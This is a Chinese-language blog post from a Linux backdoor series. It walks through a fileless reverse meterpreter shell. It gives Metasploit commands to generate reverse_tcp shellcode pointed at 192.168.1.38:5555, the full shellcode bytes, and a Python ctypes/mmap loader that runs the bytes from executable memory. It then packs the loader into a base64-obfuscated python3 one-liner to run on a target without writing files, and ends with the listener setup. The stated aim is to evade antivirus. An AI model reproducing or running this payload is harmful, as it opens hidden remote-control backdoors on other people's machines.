其他
不落地反弹meterpreter | Linux后门系列
之前一直看大家在做分离免杀,但大部分都是windows上的,既然学习Linux,就搞一个Linux版本的一句话反弹meterpreter,借用分离免杀的思想:用 Python3 执行 shellcode
payload : linux/x64/meterpreter/reverse_tcp
生成shellcode
use payload/linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.38
set lport 5555
generate
获取到shellcode
buf =
"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31" +
"\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51" +
"\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01" +
"\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00" +
"\x15\xb3\xc0\xa8\x01\x26\x51\x48\x89\xe6\x6a\x10\x5a\x6a" +
"\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74" +
"\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31" +
"\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58" +
"\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0" +
"\x78\xed\xff\xe6"
下面就是 python3 shellcode 加载器的问题
import ctypes, mmap
def create_shellcode_function (shellcode_bytes):
# Allocate memory with a RWX private anonymous mmap
exec_mem = mmap.mmap(-1, len(shellcode_bytes),
prot = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
flags = mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)
# Copy shellcode from bytes object to executable memory
exec_mem.write(shellcode_bytes)
# Cast the memory to a C function object
ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
function = ctypes.CFUNCTYPE( ctypes.c_int64 )(ctypes.addressof(ctypes_buffer))
function._avoid_gc_for_mmap = exec_mem
# Return pointer to shell code function in executable memory
return function
buf = "shellcode"
# linux machine code
shellcode = buf
# Create a pointer to our shell code and execute it with no parameters
create_shellcode_function(shellcode)()
把我们的shellcode加入到加载器中进行拼装
import ctypes, mmap
def create_shellcode_function (shellcode_bytes):
# Allocate memory with a RWX private anonymous mmap
exec_mem = mmap.mmap(-1, len(shellcode_bytes),
prot = mmap.PROT_READ | mmap.PROT_WRITE | mmap.PROT_EXEC,
flags = mmap.MAP_ANONYMOUS | mmap.MAP_PRIVATE)
# Copy shellcode from bytes object to executable memory
exec_mem.write(shellcode_bytes)
# Cast the memory to a C function object
ctypes_buffer = ctypes.c_int.from_buffer(exec_mem)
function = ctypes.CFUNCTYPE( ctypes.c_int64 )(ctypes.addressof(ctypes_buffer))
function._avoid_gc_for_mmap = exec_mem
# Return pointer to shell code function in executable memory
return function
buf = b"\x48\x31\xff\x6a\x09\x58\x99\xb6\x10\x48\x89\xd6\x4d\x31\xc9\x6a\x22\x41\x5a\xb2\x07\x0f\x05\x48\x85\xc0\x78\x51\x6a\x0a\x41\x59\x50\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x85\xc0\x78\x3b\x48\x97\x48\xb9\x02\x00\x15\xb3\xc0\xa8\x01\x26\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a\x58\x0f\x05\x59\x48\x85\xc0\x79\x25\x49\xff\xc9\x74\x18\x57\x6a\x23\x58\x6a\x00\x6a\x05\x48\x89\xe7\x48\x31\xf6\x0f\x05\x59\x59\x5f\x48\x85\xc0\x79\xc7\x6a\x3c\x58\x6a\x01\x5f\x0f\x05\x5e\x6a\x7e\x5a\x0f\x05\x48\x85\xc0\x78\xed\xff\xe6"
# linux machine code
shellcode = buf
# Create a pointer to our shell code and execute it with no parameters
create_shellcode_function(shellcode)()
这样我们要执行的payload就组装完了,怎么一句话不落地执行呢?看了之前文章的都知道 python3 -c 'codes'
借用之前的payload进行修改
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IGN0eXBlcywgbW1hcAoKZGVmIGNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24gKHNoZWxsY29kZV9ieXRlcyk6CgogICAgIyBBbGxvY2F0ZSBtZW1vcnkgd2l0aCBhIFJXWCBwcml2YXRlIGFub255bW91cyBtbWFwCiAgICBleGVjX21lbSA9IG1tYXAubW1hcCgtMSwgbGVuKHNoZWxsY29kZV9ieXRlcyksCiAgICAgICAgICAgICAgICAgICAgICAgICBwcm90ID0gbW1hcC5QUk9UX1JFQUQgfCBtbWFwLlBST1RfV1JJVEUgfCBtbWFwLlBST1RfRVhFQywKICAgICAgICAgICAgICAgICAgICAgICAgIGZsYWdzID0gbW1hcC5NQVBfQU5PTllNT1VTIHwgbW1hcC5NQVBfUFJJVkFURSkKCiAgICAjIENvcHkgc2hlbGxjb2RlIGZyb20gYnl0ZXMgb2JqZWN0IHRvIGV4ZWN1dGFibGUgbWVtb3J5CiAgICBleGVjX21lbS53cml0ZShzaGVsbGNvZGVfYnl0ZXMpCgogICAgIyBDYXN0IHRoZSBtZW1vcnkgdG8gYSBDIGZ1bmN0aW9uIG9iamVjdAogICAgY3R5cGVzX2J1ZmZlciA9IGN0eXBlcy5jX2ludC5mcm9tX2J1ZmZlcihleGVjX21lbSkKICAgIGZ1bmN0aW9uID0gY3R5cGVzLkNGVU5DVFlQRSggY3R5cGVzLmNfaW50NjQgKShjdHlwZXMuYWRkcmVzc29mKGN0eXBlc19idWZmZXIpKQogICAgZnVuY3Rpb24uX2F2b2lkX2djX2Zvcl9tbWFwID0gZXhlY19tZW0KCiAgICAjIFJldHVybiBwb2ludGVyIHRvIHNoZWxsIGNvZGUgZnVuY3Rpb24gaW4gZXhlY3V0YWJsZSBtZW1vcnkKICAgIHJldHVybiBmdW5jdGlvbgoKYnVmID0gYiJceDQ4XHgzMVx4ZmZceDZhXHgwOVx4NThceDk5XHhiNlx4MTBceDQ4XHg4OVx4ZDZceDRkXHgzMVx4YzlceDZhXHgyMlx4NDFceDVhXHhiMlx4MDdceDBmXHgwNVx4NDhceDg1XHhjMFx4NzhceDUxXHg2YVx4MGFceDQxXHg1OVx4NTBceDZhXHgyOVx4NThceDk5XHg2YVx4MDJceDVmXHg2YVx4MDFceDVlXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHgzYlx4NDhceDk3XHg0OFx4YjlceDAyXHgwMFx4MTVceGIzXHhjMFx4YThceDAxXHgyNlx4NTFceDQ4XHg4OVx4ZTZceDZhXHgxMFx4NWFceDZhXHgyYVx4NThceDBmXHgwNVx4NTlceDQ4XHg4NVx4YzBceDc5XHgyNVx4NDlceGZmXHhjOVx4NzRceDE4XHg1N1x4NmFceDIzXHg1OFx4NmFceDAwXHg2YVx4MDVceDQ4XHg4OVx4ZTdceDQ4XHgzMVx4ZjZceDBmXHgwNVx4NTlceDU5XHg1Zlx4NDhceDg1XHhjMFx4NzlceGM3XHg2YVx4M2NceDU4XHg2YVx4MDFceDVmXHgwZlx4MDVceDVlXHg2YVx4N2VceDVhXHgwZlx4MDVceDQ4XHg4NVx4YzBceDc4XHhlZFx4ZmZceGU2IgoKIyBsaW51eCBtYWNoaW5lIGNvZGUKc2hlbGxjb2RlID0gYnVmCgojIENyZWF0ZSBhIHBvaW50ZXIgdG8gb3VyIHNoZWxsIGNvZGUgYW5kIGV4ZWN1dGUgaXQgd2l0aCBubyBwYXJhbWV0ZXJzCmNyZWF0ZV9zaGVsbGNvZGVfZnVuY3Rpb24oc2hlbGxjb2RlKSgp')))
监听+执行
攻击机监听
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.38
set lport 5555
run
目标主机上执行
成功获取到 meterpreter shell !
反弹shell章节就此结束。
往期文章
python3 反弹shell & 隐藏后门 | Linux 后门系列
dash & rbash & nc.openbsd | Linux 后门系列